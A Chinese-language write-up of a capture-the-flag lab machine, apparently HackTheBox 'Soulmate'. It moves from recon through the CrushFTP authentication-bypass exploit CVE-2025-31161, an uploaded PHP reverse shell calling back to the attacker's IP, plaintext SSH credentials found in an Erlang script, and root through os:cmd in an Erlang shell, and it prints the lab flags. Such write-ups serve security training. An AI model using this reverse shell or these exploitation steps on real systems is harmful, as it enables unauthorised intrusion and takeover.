信息收集
nmap扫描
┌──(root㉿kali-linux-2024-2)-[~]
└─# nmap 10.129.231.23
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-02-21 18:38 CST
Nmap scan report for 10.129.231.23
Host is up (2.2s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 25.06 seconds
(后来全端口扫描了,但是没贴上)User
80端口,跳转域名soulmate.htb,将此域名加入到/etc/hosts中即可
dirsearch扫一下
┌──(root㉿kali-linux-2024-2)-[~]
└─# dirsearch -u http://soulmate.htb/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/reports/http_soulmate.htb/__26-02-21_19-19-36.txt
Target: http://soulmate.htb/
[19:19:36] Starting:
[19:21:02] 301 - 178B - /assets -> http://soulmate.htb/assets/
[19:21:02] 403 - 564B - /assets/
[19:21:22] 302 - 0B - /dashboard.php -> /login
[19:21:54] 200 - 8KB - /login.php
[19:21:55] 302 - 0B - /logout.php -> login.php
[19:22:20] 302 - 0B - /profile.php -> /login
[19:22:25] 200 - 11KB - /register.php
Task Completed ┌──(root㉿kali-linux-2024-2)-[~]
└─# ffuf -u 'http://soulmate.htb' -w /usr/share/wordlists/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt -H "HOST: FUZZ.soulmate.htb" -ac
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://soulmate.htb
:: Wordlist : FUZZ: /usr/share/wordlists/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt
:: Header : Host: FUZZ.soulmate.htb
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
ftp [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 53ms]将爆出来的子域名也加入到hosts中
利用 CrushFTP 身份验证绕过漏洞获取管理员权限
控制面板上有很多模块,包括用户管理器,凭借权限,我们可以重置用户的密码并查看其虚拟文件系统 (VFS)
┌──(root㉿kali-linux-2024-2)-[/home/parallels/Desktop]
└─# python cve-2025-31161.py --target_host ftp.soulmate.htb --port 80 --target_user root --new_user sunempty --password admin123
[+] Preparing Payloads
[-] Warming up the target
[-] Target is up and running
[+] Sending Account Create Request
[!] User created successfully
[+] Exploit Complete you can now login with
[*] Username: sunempty
[*] Password: admin123.
在这可以修改用户的账号密码,这里修改ben的账号密码,可以看到ben用户将网站的根目录添加到了他的虚拟文件系统(VFS)中
ben文件夹下没东西,点其他的会莫名退出登录不知道为啥,然后在webProd上传文件到webProd目录下,对应的站点就是主域名
成功回显
然后我尝试反弹shell,但是要么连不上要么不稳定,所以决定直接上传php文件执行连接
<?php
$ip = '10.10.xx.xx';
$port = 4444;
$sock = fsockopen($ip, $port);
$proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);
?>
反弹shell上去后,找了老半天没找到user.txt然后查看一下文件,看当前进程和文件,找到了这个
www-data@soulmate:~$ cat /usr/local/lib/erlang_login/start.escript
cat /usr/local/lib/erlang_login/start.escript
#!/usr/bin/env escript
%%! -sname ssh_runner
main(_) ->
application:start(asn1),
application:start(crypto),
application:start(public_key),
application:start(ssh),
io:format("Starting SSH daemon with logging...~n"),
case ssh:daemon(2222, [
{ip, {127,0,0,1}},
{system_dir, "/etc/ssh"},
{user_dir_fun, fun(User) ->
Dir = filename:join("/home", User),
io:format("Resolving user_dir for ~p: ~s/.ssh~n", [User, Dir]),
filename:join(Dir, ".ssh")
end},
{connectfun, fun(User, PeerAddr, Method) ->
io:format("Auth success for user: ~p from ~p via ~p~n",
[User, PeerAddr, Method]),
true
end},
{failfun, fun(User, PeerAddr, Reason) ->
io:format("Auth failed for user: ~p from ~p, reason: ~p~n",
[User, PeerAddr, Reason]),
true
end},
{auth_methods, "publickey,password"},
{user_passwords, [{"ben", "HouseH0ldings998"}]},
{idle_time, infinity},
{max_channels, 10},
{max_sessions, 10},
{parallel_login, true}
]) of
{ok, _Pid} ->
io:format("SSH daemon running on port 2222. Press Ctrl+C to exit.~n");
{error, Reason} ->
io:format("Failed to start SSH daemon: ~p~n", [Reason])
end,
receive
stop -> ok
end.
www-data@soulmate:~$
找到了ben的ssh账号密码
ben/HouseH0ldings998
ssh登上去,得到user.txt
┌──(root㉿kali-linux-2024-2)-[/home/parallels/Desktop]
└─# ssh ben@10.129.231.23
The authenticity of host '10.129.231.23 (10.129.231.23)' can't be established.
ED25519 key fingerprint is SHA256:TgNhCKF6jUX7MG8TC01/MUj/+u0EBasUVsdSQMHdyfY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.231.23' (ED25519) to the list of known hosts.
ben@10.129.231.23's password:
Last login: Sat Feb 21 13:05:34 2026 from 10.10.16.35
ben@soulmate:~$ ls
user.txt
ben@soulmate:~$ cat user.txt
724dbf138b24035825e8293aade662cf
ben@soulmate:~$
Root
翻找文件的时候不难看到有很多Erlang文件,查看端口信息也可以看到进程
ben@soulmate:~$ ps au
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1172 0.0 0.0 6176 1116 tty1 Ss+ 10:34 0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
www-data 2858 0.0 0.0 7984 3984 pts/0 Ss+ 12:59 0:00 /bin/bash
ben 2978 0.0 0.1 8656 5488 pts/1 Ss 13:05 0:00 /bin/bash -l
ben 3026 0.0 0.0 10072 1588 pts/1 R+ 13:08 0:00 ps au
ben@soulmate:~$ ss -tuln
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 5 127.0.0.1:2222 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:34981 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:8443 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.1:41877 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:9090 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:8080 0.0.0.0:*
tcp LISTEN 0 4096 0.0.0.0:4369 0.0.0.0:*
tcp LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 4096 [::]:4369 [::]:*
tcp LISTEN 0 511 [::]:80 [::]:*
tcp LISTEN 0 128 [::]:22 [::]:* 0.0.0.0:4369 LISTEN
127.0.0.1:2222 LISTENben@soulmate:~$ epmd -names
epmd: up and running on port 4369 with data:
name ssh_runner at port 41877看了通信映射,但是没找到cookie远程打不了,然后2222端口可以打本地
其中基本可以确定机器运行着 Erlang 分布式服务,4369 是 epmd,epmd 是 Erlang 节点发现服务
很明显就是利用Erlang提权了
ssh上去查看一下
ssh -p 2222 ben@localhost
ben@localhost's password:
Eshell V15.2.5 (press Ctrl+G to abort, type help(). for help)直接进入 Erlang 节点的交互式 shell,可以到Erlang官网看看
(ssh_runner@soulmate)1> help()
.
** shell internal commands **
b() -- display all variable bindings
e(N) -- repeat the expression in query <N>
f() -- forget all variable bindings
f(X) -- forget the binding of variable X
h() -- history
h(Mod) -- help about module
h(Mod,Func)-- help about function in module
h(Mod,Func,Arity) -- help about function with arity in module
ht(Mod) -- help about a module's types
ht(Mod,Type) -- help about type in module
ht(Mod,Type,Arity) -- help about type with arity in module
hcb(Mod) -- help about a module's callbacks
hcb(Mod,CB) -- help about callback in module
hcb(Mod,CB,Arity) -- help about callback with arity in module
history(N) -- set how many previous commands to keep
results(N) -- set how many previous command results to keep
catch_exception(B) -- how exceptions are handled
v(N) -- use the value of query <N>
rd(R,D) -- define a record
rf() -- remove all record information
rf(R) -- remove record information about R
rl() -- display all record information
rl(R) -- display record information about R
rp(Term) -- display Term using the shell's record information
rr(File) -- read record information from File (wildcards allowed)
rr(F,R) -- read selected record information from file(s)
rr(F,R,O) -- read selected record information with options
lf() -- list locally defined functions
lt() -- list locally defined types
lr() -- list locally defined records
ff() -- forget all locally defined functions
ff({F,A}) -- forget locally defined function named as atom F and arity A
tf() -- forget all locally defined types
tf(T) -- forget locally defined type named as atom T
fl() -- forget all locally defined functions, types and records
save_module(FilePath) -- save all locally defined functions, types and records to a file
bt(Pid) -- stack backtrace for a process
c(Mod) -- compile and load module or file <Mod>
cd(Dir) -- change working directory
flush() -- flush any messages sent to the shell
help() -- help info
h(M) -- module documentation
h(M,F) -- module function documentation
h(M,F,A) -- module function arity documentation
i() -- information about the system
ni() -- information about the networked system
i(X,Y,Z) -- information about pid <X,Y,Z>
l(Module) -- load or reload module
lm() -- load all modified modules
lc([File]) -- compile a list of Erlang modules
ls() -- list files in the current directory
ls(Dir) -- list files in directory <Dir>
m() -- which modules are loaded
m(Mod) -- information about module <Mod>
mm() -- list all modified modules
memory() -- memory allocation information
memory(T) -- memory allocation information of type <T>
nc(File) -- compile and load code in <File> on all nodes
nl(Module) -- load module on all nodes
pid(X,Y,Z) -- convert X,Y,Z to a Pid
pwd() -- print working directory
q() -- quit - shorthand for init:stop()
regs() -- information about registered processes
nregs() -- information about all registered processes
uptime() -- print node uptime
xm(M) -- cross reference check a module
y(File) -- generate a Yecc parser
** commands in module i (interpreter interface) **
ih() -- print help for the i module
true
(ssh_runner@soulmate)2> pwd().
/
ok
(ssh_runner@soulmate)3> m().
Module File
application /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/application.beam
application_controll /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/application_controller.beam
application_master /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/application_master.beam
atomics preloaded
auth /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/auth.beam
base64 /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/base64.beam
beam_a /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_a.beam
beam_asm /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_asm.beam
beam_block /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_block.beam
beam_call_types /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_call_types.beam
beam_clean /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_clean.beam
beam_core_to_ssa /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_core_to_ssa.beam
beam_dict /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_dict.beam
beam_digraph /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_digraph.beam
beam_doc /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_doc.beam
beam_flatten /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_flatten.beam
beam_jump /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_jump.beam
beam_lib /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/beam_lib.beam
beam_opcodes /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_opcodes.beam
beam_ssa /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_ssa.beam
beam_ssa_alias /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_ssa_alias.beam
beam_ssa_bc_size /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_ssa_bc_size.beam
beam_ssa_bool /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_ssa_bool.beam
beam_ssa_bsm /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_ssa_bsm.beam
beam_ssa_codegen /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_ssa_codegen.beam
beam_ssa_dead /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_ssa_dead.beam
beam_ssa_destructive /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_ssa_destructive_update.beam
beam_ssa_opt /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_ssa_opt.beam
beam_ssa_pre_codegen /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_ssa_pre_codegen.beam
beam_ssa_recv /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_ssa_recv.beam
beam_ssa_share /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_ssa_share.beam
beam_ssa_ss /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_ssa_ss.beam
beam_ssa_throw /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_ssa_throw.beam
beam_ssa_type /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_ssa_type.beam
beam_trim /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_trim.beam
beam_types /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_types.beam
beam_utils /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_utils.beam
beam_validator /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_validator.beam
beam_z /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_z.beam
binary /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/binary.beam
c /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/c.beam
cerl /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/cerl.beam
cerl_clauses /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/cerl_clauses.beam
cerl_trees /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/cerl_trees.beam
code /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/code.beam
code_server /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/code_server.beam
compile /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/compile.beam
core_lib /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/core_lib.beam
counters preloaded
crypto /usr/local/lib/erlang/lib/crypto-5.5.3/ebin/crypto.beam
digraph /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/digraph.beam
digraph_utils /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/digraph_utils.beam
edlin /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/edlin.beam
edlin_key /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/edlin_key.beam
epp /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/epp.beam
erl_abstract_code /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/erl_abstract_code.beam
erl_anno /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/erl_anno.beam
erl_bifs /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/erl_bifs.beam
erl_distribution /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/erl_distribution.beam
erl_epmd /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/erl_epmd.beam
erl_error /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/erl_error.beam
erl_eval /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/erl_eval.beam
erl_expand_records /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/erl_expand_records.beam
erl_features /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/erl_features.beam
erl_init preloaded
erl_internal /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/erl_internal.beam
erl_lint /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/erl_lint.beam
erl_parse /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/erl_parse.beam
erl_prim_loader preloaded
erl_scan /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/erl_scan.beam
erl_signal_handler /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/erl_signal_handler.beam
erl_tracer preloaded
erlang preloaded
erpc /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/erpc.beam
error_handler /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/error_handler.beam
error_logger /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/error_logger.beam
erts_code_purger preloaded
erts_dirty_process_s preloaded
erts_internal preloaded
erts_literal_area_co preloaded
erts_trace_cleaner preloaded
escript /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/escript.beam
ets /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/ets.beam
file /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/file.beam
file_io_server /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/file_io_server.beam
file_server /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/file_server.beam
filename /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/filename.beam
gb_sets /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/gb_sets.beam
gb_trees /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/gb_trees.beam
gen /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/gen.beam
gen_event /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/gen_event.beam
gen_server /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/gen_server.beam
gen_statem /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/gen_statem.beam
gen_tcp /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/gen_tcp.beam
global /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/global.beam
global_group /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/global_group.beam
group /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/group.beam
group_history /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/group_history.beam
heart /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/heart.beam
inet /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/inet.beam
inet_config /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/inet_config.beam
inet_db /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/inet_db.beam
inet_gethost_native /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/inet_gethost_native.beam
inet_parse /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/inet_parse.beam
inet_tcp /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/inet_tcp.beam
inet_tcp_dist /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/inet_tcp_dist.beam
inet_udp /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/inet_udp.beam
init preloaded
io /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/io.beam
io_lib /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/io_lib.beam
io_lib_format /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/io_lib_format.beam
io_lib_pretty /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/io_lib_pretty.beam
kernel /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/kernel.beam
kernel_config /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/kernel_config.beam
kernel_refc /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/kernel_refc.beam
lists /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/lists.beam
logger /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/logger.beam
logger_backend /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/logger_backend.beam
logger_config /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/logger_config.beam
logger_filters /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/logger_filters.beam
logger_formatter /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/logger_formatter.beam
logger_h_common /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/logger_h_common.beam
logger_handler_watch /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/logger_handler_watcher.beam
logger_olp /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/logger_olp.beam
logger_proxy /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/logger_proxy.beam
logger_server /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/logger_server.beam
logger_simple_h /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/logger_simple_h.beam
logger_std_h /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/logger_std_h.beam
logger_sup /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/logger_sup.beam
maps /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/maps.beam
net_kernel /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/net_kernel.beam
orddict /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/orddict.beam
ordsets /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/ordsets.beam
os /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/os.beam
otp_internal /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/otp_internal.beam
peer /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/peer.beam
persistent_term preloaded
prim_buffer preloaded
prim_eval preloaded
prim_file preloaded
prim_inet preloaded
prim_net preloaded
prim_socket preloaded
prim_tty /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/prim_tty.beam
prim_zip preloaded
proc_lib /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/proc_lib.beam
proplists /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/proplists.beam
pubkey_cert_records /usr/local/lib/erlang/lib/public_key-1.17.1/ebin/pubkey_cert_records.beam
public_key /usr/local/lib/erlang/lib/public_key-1.17.1/ebin/public_key.beam
queue /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/queue.beam
rand /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/rand.beam
raw_file_io /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/raw_file_io.beam
raw_file_io_list /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/raw_file_io_list.beam
re /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/re.beam
rpc /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/rpc.beam
sets /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/sets.beam
shell /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/shell.beam
shell_default /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/shell_default.beam
socket_registry preloaded
sofs /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/sofs.beam
ssh /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh.beam
ssh_acceptor /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_acceptor.beam
ssh_acceptor_sup /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_acceptor_sup.beam
ssh_app /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_app.beam
ssh_auth /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_auth.beam
ssh_bits /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_bits.beam
ssh_channel_sup /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_channel_sup.beam
ssh_cli /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_cli.beam
ssh_client_channel /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_client_channel.beam
ssh_connection /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_connection.beam
ssh_connection_handl /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_connection_handler.beam
ssh_connection_sup /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_connection_sup.beam
ssh_file /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_file.beam
ssh_fsm_kexinit /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_fsm_kexinit.beam
ssh_fsm_userauth_ser /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_fsm_userauth_server.beam
ssh_lib /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_lib.beam
ssh_message /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_message.beam
ssh_options /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_options.beam
ssh_server_channel /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_server_channel.beam
ssh_sftpd /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_sftpd.beam
ssh_system_sup /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_system_sup.beam
ssh_tcpip_forward_ac /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_tcpip_forward_acceptor_sup.beam
ssh_transport /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_transport.beam
standard_error /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/standard_error.beam
start_escript__escri /usr/local/lib/erlang_login/start.escript
string /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/string.beam
supervisor /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/supervisor.beam
supervisor_bridge /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/supervisor_bridge.beam
sys_core_alias /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/sys_core_alias.beam
sys_core_bsm /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/sys_core_bsm.beam
sys_core_fold /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/sys_core_fold.beam
unicode /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/unicode.beam
unicode_util /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/unicode_util.beam
user_drv /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/user_drv.beam
user_sup /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/user_sup.beam
v3_core /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/v3_core.beam
zlib preloaded
ok
(ssh_runner@soulmate)4>看到有os模块可以利用
(ssh_runner@soulmate)5> os:cmd('id').
"uid=0(root) gid=0(root) groups=0(root)\n"
(ssh_runner@soulmate)6> os:cmd('cat /root/root.txt').
"13250465961261f2fc068a043edccfff\n"
(ssh_runner@soulmate)7> 得到root.txt
总结
注重信息收集,当拿下普通权限时,一定要多注意进程和历史命令
